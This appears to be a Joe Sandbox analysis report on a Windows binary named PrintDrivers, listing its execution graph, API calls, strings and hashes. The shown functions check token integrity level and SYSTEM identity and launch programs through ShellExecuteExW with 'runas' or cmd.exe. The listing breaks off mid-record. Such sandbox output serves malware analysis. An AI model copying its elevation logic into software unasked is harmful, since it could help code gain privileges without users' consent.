                                                                    execution_graph 32584 5a4f11 32585 5a4f1d __FrameHandler3::FrameUnwindToState 32584->32585 32610 5a4c6f 32585->32610 32587 5a4f24 32588 5a5077 32587->32588 32599 5a4f4e ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 32587->32599 32644 5a5248 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 32588->32644 32590 5a507e 32591 5a5084 32590->32591 32645 5b3d82 23 API calls __FrameHandler3::FrameUnwindToState 32590->32645 32646 5b3d46 23 API calls __FrameHandler3::FrameUnwindToState 32591->32646 32594 5a508c 32595 5a4f6d 32596 5a4fee 32621 5a5362 GetStartupInfoW ___scrt_fastfail 32596->32621 32598 5a4ff4 32622 590440 GetCommandLineW 32598->32622 32599->32595 32599->32596 32643 5b2141 34 API calls 3 library calls 32599->32643 32611 5a4c78 32610->32611 32647 5a5448 IsProcessorFeaturePresent 32611->32647 32613 5a4c84 32648 5a7ce0 10 API calls 2 library calls 32613->32648 32615 5a4c89 32616 5a4c8d 32615->32616 32649 5b47db 32615->32649 32616->32587 32619 5a4ca4 32619->32587 32621->32598 32623 590488 32622->32623 32705 582e30 LocalAlloc 32623->32705 32625 590499 32706 5866f0 32625->32706 32627 5904e8 32628 5904f9 32627->32628 32629 5904ec 32627->32629 32714 58fd30 LocalAlloc LocalAlloc 32628->32714 32800 586350 82 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 32629->32800 32632 590502 32715 58ff00 32632->32715 32633 5904f5 32635 590540 ExitProcess 32633->32635 32639 59052a 32801 590370 CreateFileW SetFilePointer WriteFile CloseHandle 32639->32801 32640 590534 32802 590550 LocalFree LocalFree 32640->32802 32643->32596 32644->32590 32645->32591 32646->32594 32647->32613 32648->32615 32653 5bcac6 32649->32653 32652 5a7cff 7 API calls 2 library calls 32652->32616 32654 5bcad6 32653->32654 32655 5a4c96 32653->32655 32654->32655 32657 5b7a2d 32654->32657 32655->32619 32655->32652 32658 5b7a39 __FrameHandler3::FrameUnwindToState 32657->32658 32669 5b2b5a EnterCriticalSection 32658->32669 32660 5b7a40 32670 5bd085 32660->32670 32662 5b7a4f 32663 5b7a5e 32662->32663 32681 5b78c3 17 API calls 32662->32681 32683 5b7a84 LeaveCriticalSection std::_Lockit::~_Lockit 32663->32683 32666 5b7a59 32682 5b7979 GetStdHandle GetFileType 32666->32682 32667 5b7a6f 32667->32654 32669->32660 32671 5bd091 __FrameHandler3::FrameUnwindToState 32670->32671 32672 5bd0bb 32671->32672 32673 5bd09a 32671->32673 32684 5b2b5a EnterCriticalSection 32672->32684 32692 5a9a7c 14 API calls __dosmaperr 32673->32692 32676 5bd09f ___std_exception_copy 32676->32662 32677 5bd0c7 32680 5bd0f3 32677->32680 32685 5bcfd5 32677->32685 32693 5bd11a LeaveCriticalSection std::_Lockit::~_Lockit 32680->32693 32681->32666 32682->32663 32683->32667 32684->32677 32694 5b985e 32685->32694 32687 5bcff4 32702 5b6238 14 API calls 2 library calls 32687->32702 32690 5bd049 32690->32677 32691 5bcfe7 32691->32687 32701 5b8473 6 API calls std::_Lockit::_Lockit 32691->32701 32692->32676 32693->32676 32699 5b986b std::_Locinfo::_W_Getmonths 32694->32699 32695 5b98ab 32704 5a9a7c 14 API calls __dosmaperr 32695->32704 32696 5b9896 RtlAllocateHeap 32698 5b98a9 32696->32698 32696->32699 32698->32691 32699->32695 32699->32696 32703 5bcb6e EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getmonths 32699->32703 32701->32691 32702->32690 32703->32699 32704->32698 32705->32625 32707 586742 32706->32707 32708 586784 32707->32708 32711 586772 32707->32711 32709 5a47c1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 32708->32709 32710 586792 32709->32710 32710->32627 32803 5a47c1 32711->32803 32713 586780 32713->32627 32714->32632 32716 5901c2 32715->32716 32717 58ff19 32715->32717 32722 5867a0 32716->32722 32717->32716 32718 590222 32717->32718 32811 585f30 14 API calls 32718->32811 32720 590232 RegOpenKeyExW 32720->32716 32721 590250 RegQueryValueExW 32720->32721 32721->32716 32723 5867dc GetCurrentProcess OpenProcessToken 32722->32723 32798 5867d4 32722->32798 32727 58683b 32723->32727 32728 586811 32723->32728 32724 5a47c1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 32726 586cd9 32724->32726 32726->32639 32726->32640 32812 585ad0 32727->32812 32729 586834 32728->32729 32730 586826 CloseHandle 32728->32730 32857 5856c0 GetCurrentProcess OpenProcessToken 32729->32857 32730->32729 32734 586860 32738 586871 32734->32738 32739 586864 32734->32739 32735 586852 32737 581600 12 API calls 32735->32737 32736 586954 32740 586b0f 32736->32740 32746 58696e 32736->32746 32737->32728 32815 585c30 ConvertSidToStringSidW 32738->32815 32741 581600 12 API calls 32739->32741 32862 582410 29 API calls 32740->32862 32741->32728 32745 586b3a 32748 586cdd 32745->32748 32863 583e60 25 API calls 32745->32863 32915 582410 29 API calls 32746->32915 32928 581170 RaiseException _com_raise_error 32748->32928 32750 58697f 32750->32748 32916 583e60 25 API calls 32750->32916 32753 5868b0 32843 582d40 32753->32843 32757 586b89 32864 582410 29 API calls 32757->32864 32758 582d40 12 API calls 32760 586920 32758->32760 32849 581600 32760->32849 32762 586b98 32762->32748 32865 583e60 25 API calls 32762->32865 32763 586b5f 32763->32757 32925 584250 15 API calls 3 library calls 32763->32925 32765 5869d9 32918 582410 29 API calls 32765->32918 32769 5869a4 32769->32765 32769->32769 32917 584250 15 API calls 3 library calls 32769->32917 32770 5869e8 32770->32748 32919 583e60 25 API calls 32770->32919 32771 586941 CloseHandle 32771->32729 32774 586be9 32866 582410 29 API calls 32774->32866 32777 586bba 32777->32774 32926 584250 15 API calls 3 library calls 32777->32926 32778 586a39 32921 582410 29 API calls 32778->32921 32779 586bf4 32779->32748 32780 586bfc 32779->32780 32867 583e60 25 API calls 32780->32867 32783 586a0a 32783->32778 32783->32783 32920 584250 15 API calls 3 library calls 32783->32920 32784 586a44 32784->32748 32786 586a4c 32784->32786 32922 583e60 25 API calls 32786->32922 32788 586c40 32868 585210 32788->32868 32791 586c16 32791->32788 32791->32791 32927 584250 15 API calls 3 library calls 32791->32927 32792 586a90 32924 5849c0 155 API calls 3 library calls 32792->32924 32795 586a6e 32923 584250 15 API calls 3 library calls 32795->32923 32796 586a66 32796->32792 32796->32795 32796->32796 32798->32724 32799 586aa7 32799->32798 32800->32633 32801->32640 32802->32635 32804 5a47ca 32803->32804 32805 5a47cc IsProcessorFeaturePresent 32803->32805 32804->32713 32807 5a4831 32805->32807 32810 5a47f5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32807->32810 32809 5a4914 32809->32713 32810->32809 32811->32720 32929 585b30 GetTokenInformation 32812->32929 32816 585cc1 32815->32816 32818 585c96 32815->32818 32817 581f90 33 API calls 32816->32817 32819 585cb8 32817->32819 32820 581f90 33 API calls 32818->32820 32821 585cf2 32819->32821 32822 585ce4 LocalFree 32819->32822 32820->32819 32823 581f90 32821->32823 32822->32821 32828 581fa1 collate 32823->32828 32829 581fcd 32823->32829 32824 5820c5 32940 5826b0 16 API calls collate 32824->32940 32826 581fe5 32830 5820c0 32826->32830 32831 582036 LocalAlloc 32826->32831 32827 5820ca 32941 5a9412 11 API calls __Getctype 32827->32941 32828->32753 32829->32824 32829->32826 32829->32830 32834 582052 32829->32834 32939 582b10 LocalAlloc LocalAlloc RaiseException _com_raise_error messages 32830->32939 32831->32827 32835 582047 32831->32835 32837 582056 LocalAlloc 32834->32837 32839 582063 __Strxfrm 32834->32839 32835->32839 32837->32839 32839->32827 32840 5820b5 32839->32840 32841 5820a8 32839->32841 32840->32753 32841->32840 32842 5820ae LocalFree 32841->32842 32842->32840 32844 582d97 32843->32844 32848 582d6d 32843->32848 32844->32758 32845 582d8a 32845->32844 32846 582d90 LocalFree 32845->32846 32846->32844 32848->32843 32848->32845 32942 5a9412 11 API calls __Getctype 32848->32942 32850 58162b 32849->32850 32851 581651 32849->32851 32852 58164a LocalFree 32850->32852 32853 581644 32850->32853 32854 581675 32850->32854 32851->32729 32851->32771 32852->32851 32853->32851 32853->32852 32943 5a9412 11 API calls __Getctype 32854->32943 32858 5856e1 32857->32858 32859 5856e7 GetTokenInformation 32857->32859 32858->32736 32860 58571e CloseHandle 32859->32860 32861 585716 32859->32861 32860->32736 32861->32860 32862->32745 32863->32763 32864->32762 32865->32777 32866->32779 32867->32791 32869 58527f 32868->32869 32944 585960 32869->32944 32872 585960 15 API calls 32873 5852b6 32872->32873 32952 585840 32873->32952 32875 5852c6 32876 5856aa 32875->32876 32878 5852f2 32875->32878 32972 583fb0 15 API calls 32875->32972 32977 581170 RaiseException _com_raise_error 32876->32977 32969 5a9c0a 32878->32969 32883 58530c 32884 585960 15 API calls 32883->32884 32893 585320 32884->32893 32885 58544b GetForegroundWindow 32886 585457 32885->32886 32887 585527 ShellExecuteExW 32886->32887 32888 585540 32887->32888 32889 585537 32887->32889 32891 585578 32888->32891 32894 585553 ShellExecuteExW 32888->32894 32975 585790 6 API calls 32889->32975 32896 5855ae 32891->32896 32897 58557f 32891->32897 32892 5853bf GetWindowsDirectoryW 32973 585a10 43 API calls _swprintf 32892->32973 32893->32892 32906 5853f8 32893->32906 32894->32891 32898 58556f 32894->32898 32901 5855b7 GetModuleHandleW GetProcAddress 32896->32901 32903 58562a 32896->32903 32900 585590 WaitForSingleObject GetExitCodeProcess CloseHandle 32897->32900 32897->32903 32976 585790 6 API calls 32898->32976 32899 5853e0 32974 585a10 43 API calls _swprintf 32899->32974 32900->32903 32901->32903 32905 5855d5 CloseHandle 32901->32905 32908 5a47c1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 32903->32908 32909 5855f0 32905->32909 32906->32885 32906->32886 32910 5856a2 32908->32910 32911 58561a 32909->32911 32912 5855f5 Sleep EnumWindows 32909->32912 32910->32798 32913 585620 BringWindowToTop 32911->32913 32914 585627 32911->32914 32912->32909 32912->32911 33048 585730 GetWindowThreadProcessId GetWindowLongW 32912->33048 32913->32914 32914->32903 32915->32750 32916->32769 32917->32765 32918->32770 32919->32783 32920->32778 32921->32784 32922->32796 32923->32792 32924->32799 32925->32757 32926->32774 32927->32788 32930 585bae GetLastError 32929->32930 32931 585b08 32929->32931 32930->32931 32932 585bb9 32930->32932 32931->32734 32931->32735 32933 585bfe GetTokenInformation 32932->32933 32934 585bd9 32932->32934 32936 585bc9 ___scrt_fastfail 32932->32936 32933->32931 32938 585dc0 32 API calls 3 library calls 32934->32938 32936->32933 32937 585be2 32937->32933 32938->32937 32939->32824 32945 58599e 32944->32945 32946 5852a4 32945->32946 32947 5859fc 32945->32947 32948 5859c3 32945->32948 32946->32872 32979 584330 RaiseException 32947->32979 32978 5841a0 14 API calls 4 library calls 32948->32978 32953 585878 32952->32953 32954 5858a5 32952->32954 32955 585960 15 API calls 32953->32955 32963 5858b7 32954->32963 32980 582410 29 API calls 32954->32980 32957 585881 32955->32957 32957->32875 32958 58593d 32982 581170 RaiseException _com_raise_error 32958->32982 32959 58594c 32984 581170 RaiseException _com_raise_error 32959->32984 32962 585947 32983 584330 RaiseException 32962->32983 32963->32958 32963->32959 32963->32962 32966 5858fb 32963->32966 32981 5841a0 14 API calls 4 library calls 32966->32981 32968 585917 32968->32875 32985 5a9c21 32969->32985 32972->32878 32973->32899 32974->32906 32975->32888 32976->32891 32978->32946 32980->32963 32981->32968 32990 5a9463 32985->32990 32991 5a947a 32990->32991 32992 5a9483 32990->32992 32998 5a9a8f 32991->32998 32992->32991 33033 5b664c 34 API calls 3 library calls 32992->33033 32994 5a94a3 33034 5b689e 34 API calls __Strxfrm 32994->33034 32996 5a94b9 33035 5b68cb 34 API calls std::_Locinfo::_W_Getmonths 32996->33035 32999 5a9abd ___crtLCMapStringW 32998->32999 33001 5a9aa9 32998->33001 32999->33001 33002 5a9ad4 32999->33002 33036 5a9a7c 14 API calls __dosmaperr 33001->33036 33008 5a9aae ___std_exception_copy 33002->33008 33037 5b6946 6 API calls 2 library calls 33002->33037 33004 5a9b22 33005 5a9b2e 33004->33005 33006 5a9b45 33004->33006 33038 5a9a7c 14 API calls __dosmaperr 33005->33038 33010 5a9b4a 33006->33010 33011 5a9b5b 33006->33011 33007 5a47c1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 33012 5852fe 33007->33012 33008->33007 33040 5a9a7c 14 API calls __dosmaperr 33010->33040 33018 5a9b83 33011->33018 33022 5a9b70 __alloca_probe_16 33011->33022 33012->32876 33012->32883 33013 5a9b33 33039 5a9a7c 14 API calls __dosmaperr 33013->33039 33016 5a9ba0 33042 5a9a7c 14 API calls __dosmaperr 33016->33042 33017 5a9bb4 33044 5b6946 6 API calls 2 library calls 33017->33044 33041 5b68f8 15 API calls 2 library calls 33018->33041 33022->33016 33022->33017 33023 5a9b89 33023->33022 33024 5a9ba5 33043 5a9a7c 14 API calls __dosmaperr 33024->33043 33025 5a9bce 33026 5a9be6 33025->33026 33027 5a9bd5 33025->33027 33046 5a9a7c 14 API calls __dosmaperr 33026->33046 33045 5b390b 14 API calls 2 library calls 33027->33045 33031 5a9bb0 33047 5a3d0a 14 API calls std::_Locinfo::_Getmonths 33031->33047 33033->32994 33034->32996 33035->32991 33036->33008 33037->33004 33038->33013 33039->33008 33040->33008 33041->33023 33042->33024 33043->33031 33044->33025 33045->33031 33046->33031 33047->33008

                                                                    Executed Functions

                                                                    Function 005867A0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 456COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 97 5867a0-5867d2 98 5867dc-58680f GetCurrentProcess OpenProcessToken 97->98 99 5867d4-5867d7 97->99 104 58683b-586850 call 585ad0 98->104 105 586811-586824 98->105 100 586cc1-586cdc call 5a47c1 99->100 112 586860-586862 104->112 113 586852-58685e call 581600 104->113 106 586834-586836 105->106 107 586826-58682d CloseHandle 105->107 109 58694f-586956 call 5856c0 106->109 107->106 118 58695c-586960 109->118 119 586b0f-586b3c call 582410 109->119 116 586871-5868d0 call 585c30 call 581f90 112->116 117 586864-58686f call 581600 112->117 113->105 134 5868d2-5868d4 116->134 135 586906 116->135 117->105 118->119 124 586966-586968 118->124 131 586cdd-586ce7 call 581170 119->131 132 586b42-586b61 call 583e60 119->132 124->119 128 58696e-586981 call 582410 124->128 128->131 142 586987-5869a6 call 583e60 128->142 152 586b89-586b9a call 582410 132->152 153 586b63-586b65 132->153 138 5868da-5868e3 134->138 139 5869b0-5869b2 134->139 141 586908-58693f call 582d40 * 2 call 581600 135->141 138->135 144 5868e5-5868e7 138->144 139->141 141->109 177 586941-586948 CloseHandle 141->177 166 5869a8-5869aa 142->166 167 5869d9-5869ea call 582410 142->167 147 5868ea 144->147 147->135 151 5868ec-5868ef 147->151 151->139 156 5868f5-586904 151->156 152->131 168 586ba0-586bbc call 583e60 152->168 157 586b6b-586b6d 153->157 158 586b67-586b69 153->158 156->135 156->147 164 586b70-586b79 157->164 163 586b7f-586b84 call 584250 158->163 163->152 164->164 170 586b7b-586b7d 164->170 173 5869ac-5869ae 166->173 174 5869b7-5869bc 166->174 167->131 182 5869f0-586a0c call 583e60 167->182 186 586be9-586bf6 call 582410 168->186 187 586bbe-586bc0 168->187 170->163 178 5869cf-5869d4 call 584250 173->178 175 5869c0-5869c9 174->175 175->175 179 5869cb-5869cd 175->179 177->109 178->167 179->178 195 586a39-586a46 call 582410 182->195 196 586a0e-586a10 182->196 186->131 198 586bfc-586c18 call 583e60 186->198 189 586bc2-586bc4 187->189 190 586bc6-586bcb 187->190 193 586bdf-586be4 call 584250 189->193 194 586bd0-586bd9 190->194 193->186 194->194 200 586bdb-586bdd 194->200 195->131 210 586a4c-586a68 call 583e60 195->210 202 586a12-586a14 196->202 203 586a16-586a1b 196->203 214 586c1a-586c1c 198->214 215 586c40-586c58 call 585210 198->215 200->193 206 586a2f-586a34 call 584250 202->206 204 586a20-586a29 203->204 204->204 207 586a2b-586a2d 204->207 206->195 207->206 223 586a6a-586a6c 210->223 224 586a90-586ac1 call 5849c0 210->224 217 586c1e-586c20 214->217 218 586c22-586c24 214->218 225 586c5d-586c77 215->225 221 586c36-586c3b call 584250 217->221 222 586c27-586c30 218->222 221->215 222->222 227 586c32-586c34 222->227 229 586a6e-586a70 223->229 230 586a72-586a74 223->230 242 586acb-586adf 224->242 243 586ac3-586ac6 224->243 231 586c79-586c7c 225->231 232 586c81-586c95 225->232 227->221 236 586a86-586a8b call 584250 229->236 237 586a77-586a80 230->237 231->232 233 586c9f-586cb4 232->233 234 586c97-586c9a 232->234 240 586cbe 233->240 241 586cb6-586cb9 233->241 234->233 236->224 237->237 238 586a82-586a84 237->238 238->236 240->100 241->240 244 586ae9-586afe 242->244 245 586ae1-586ae4 242->245 243->242 246 586b08-586b0a 244->246 247 586b00-586b03 244->247 245->244 246->100 247->246
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 005867FA
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00586807
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00586827
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentHandleOpenToken
                                                                    • String ID: S-1-5-18
                                                                    • API String ID: 4052875653-4289277601
                                                                    • Opcode ID: 262e041ad55ce59233d30bade9098f73894892596bf6805c3e2aaf58b1a4f372
                                                                    • Instruction ID: bd56649f936097a3f9d4e22439b3a5840790728d6f2afd22943ca774d1a71c5f
                                                                    • Opcode Fuzzy Hash: 262e041ad55ce59233d30bade9098f73894892596bf6805c3e2aaf58b1a4f372
                                                                    • Instruction Fuzzy Hash: C102A03090065ACFDB14EFA8C959AAEBFB5FF45314F148258DC52BB295EB309E05CB90
                                                                    Function 00585210 Relevance: 52.9, APIs: 13, Strings: 17, Instructions: 388synchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 585210-5852d3 call 586080 call 585960 * 2 call 585840 9 5852d9-5852e8 0->9 10 5856aa-5856b4 call 581170 0->10 12 5852ea-5852f2 call 583fb0 9->12 13 5852f4-585306 call 5a9c0a 9->13 12->13 13->10 19 58530c-585337 call 585960 13->19 22 585339-58533c 19->22 23 585341-585345 19->23 22->23 24 5853fb-585449 23->24 25 58534b-585353 23->25 27 58544b-585454 GetForegroundWindow 24->27 28 585457-585459 24->28 26 585355-58535b 25->26 29 58537b-58537d 26->29 30 58535d-585360 26->30 27->28 31 58545f-585463 28->31 32 585527-585535 ShellExecuteExW 28->32 35 585380-585382 29->35 33 585362-58536a 30->33 34 585377-585379 30->34 36 58546e-58547a 31->36 37 585465-58546c 31->37 38 585542-585544 32->38 39 585537-585540 call 585790 32->39 33->29 44 58536c-585375 33->44 34->35 45 5853bf-5853f8 GetWindowsDirectoryW call 585a10 * 2 35->45 46 585384-585389 35->46 40 585480-58548d 36->40 37->36 37->37 42 585578-58557d 38->42 43 585546-58554c 38->43 39->38 40->40 47 58548f-58549b 40->47 52 5855ae-5855b5 42->52 53 58557f-58558a 42->53 49 58554e-585551 43->49 50 585553-58556d ShellExecuteExW 43->50 44->26 44->34 45->24 54 585390-585396 46->54 55 5854a0-5854ad 47->55 49->42 49->50 50->42 56 58556f-585573 call 585790 50->56 58 58562a-58563e 52->58 60 5855b7-5855d3 GetModuleHandleW GetProcAddress 52->60 53->58 59 585590-5855ac WaitForSingleObject GetExitCodeProcess CloseHandle 53->59 61 585398-58539b 54->61 62 5853b6-5853b8 54->62 55->55 65 5854af-585525 call 586180 * 5 55->65 56->42 68 585648-58565c 58->68 69 585640-585643 58->69 59->58 60->58 71 5855d5-5855eb CloseHandle 60->71 63 58539d-5853a5 61->63 64 5853b2-5853b4 61->64 66 5853bb-5853bd 62->66 63->62 72 5853a7-5853b0 63->72 64->66 65->32 66->24 66->45 75 58565e-585661 68->75 76 585666-58567b 68->76 69->68 82 5855f0-5855f3 71->82 72->54 72->64 75->76 78 58567d-585680 76->78 79 585685-5856a9 call 5a47c1 76->79 78->79 85 58561c-58561e 82->85 86 5855f5-585618 Sleep EnumWindows 82->86 89 585620-585621 BringWindowToTop 85->89 90 585627 85->90 86->82 88 58561a 86->88 88->89 89->90 90->58
                                                                    APIs
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,00000000), ref: 005853C8
                                                                    • GetForegroundWindow.USER32(00000000,?,?,00000000), ref: 0058544B
                                                                    • ShellExecuteExW.SHELL32(?), ref: 0058552B
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00585565
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00585593
                                                                    • GetExitCodeProcess.KERNELBASE(?,?), ref: 0058559D
                                                                    • CloseHandle.KERNEL32(?), ref: 005855A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteShell$CloseCodeDirectoryExitForegroundHandleObjectProcessSingleWaitWindowWindows
                                                                    • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Tv]$Verb:<$Visible$Window Visibility:$open$runas
                                                                    • API String ID: 3871407861-1792372284
                                                                    • Opcode ID: db9e85cec673585336f87ed0cb1df1eeb2e3eb870aad35c0a2c020d52d4e11e2
                                                                    • Instruction ID: 319e5200fb33cba60c49bde0f69be5b91a191867c2cc881236f7d4c530c505b2
                                                                    • Opcode Fuzzy Hash: db9e85cec673585336f87ed0cb1df1eeb2e3eb870aad35c0a2c020d52d4e11e2
                                                                    • Instruction Fuzzy Hash: 22E18270A006099BDF24EFA8C849BAEBBF5FF58710F54416AE815BB291FB309D45CB50
                                                                    Function 005856C0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 248 5856c0-5856df GetCurrentProcess OpenProcessToken 249 5856e1-5856e6 248->249 250 5856e7-585714 GetTokenInformation 248->250 251 58571e-58572e CloseHandle 250->251 252 585716-58571b 250->252 252->251
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000008,?,F3F544E4), ref: 005856D0
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 005856D7
                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0058570C
                                                                    • CloseHandle.KERNEL32(?), ref: 00585722
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                    • String ID:
                                                                    • API String ID: 215268677-0
                                                                    • Opcode ID: 959bca2aee448632365f956973db5b941674ab253051c204392a0029b1e53e57
                                                                    • Instruction ID: de15e4e5157496f0b6756d4ff97e594ceb18d60bb3d3aa8786997f9b42ecdef2
                                                                    • Opcode Fuzzy Hash: 959bca2aee448632365f956973db5b941674ab253051c204392a0029b1e53e57
                                                                    • Instruction Fuzzy Hash: 3CF01D74144301AFEB10AF10EC4DB9A7BE8FB54700F908819FD85E21A0E379951CEB63
                                                                    Function 00590440 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCommandLineW.KERNEL32(F3F544E4,?,?,?,?,?,?,?,?,?,005C7685,000000FF), ref: 00590478
                                                                      • Part of subcall function 00582E30: LocalAlloc.KERNEL32(00000040,00000000), ref: 00582E4D
                                                                    • ExitProcess.KERNEL32 ref: 00590541
                                                                      • Part of subcall function 00586350: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 005863CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                    • String ID: Full command line:
                                                                    • API String ID: 1878577176-831861440
                                                                    • Opcode ID: 4092a6628d266d1ef70245733739f7413e78f702a9ec026b820478bfdbaf48cf
                                                                    • Instruction ID: 0b9f6ee3c1e982261d3c89f7b1a0c92bc0b57d03ef4faf022ca9f64b5ee84bee
                                                                    • Opcode Fuzzy Hash: 4092a6628d266d1ef70245733739f7413e78f702a9ec026b820478bfdbaf48cf
                                                                    • Instruction Fuzzy Hash: DF21EC30A00155AFCF15FB60D84EFEE7BA5BF94740F044569E806A72D2EF345A08CB92
                                                                    Function 00585B30 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 285 585b30-585bac GetTokenInformation 286 585bae-585bb7 GetLastError 285->286 287 585c10-585c23 285->287 286->287 288 585bb9-585bc7 286->288 289 585bc9-585bcc 288->289 290 585bce 288->290 291 585bfb 289->291 292 585bfe-585c0a GetTokenInformation 290->292 293 585bd0-585bd7 290->293 291->292 292->287 294 585bd9-585be5 call 585dc0 293->294 295 585be7-585bf8 call 5a5f20 293->295 294->292 295->291
                                                                    APIs
                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00585B08,F3F544E4), ref: 00585BA4
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00585B08,F3F544E4), ref: 00585BAE
                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00585B08,F3F544E4), ref: 00585C0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: InformationToken$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2567405617-0
                                                                    • Opcode ID: 7be65e7440b38e41b36412d6f0a1afaa034a8e7e2489e301212fb7106445ebe6
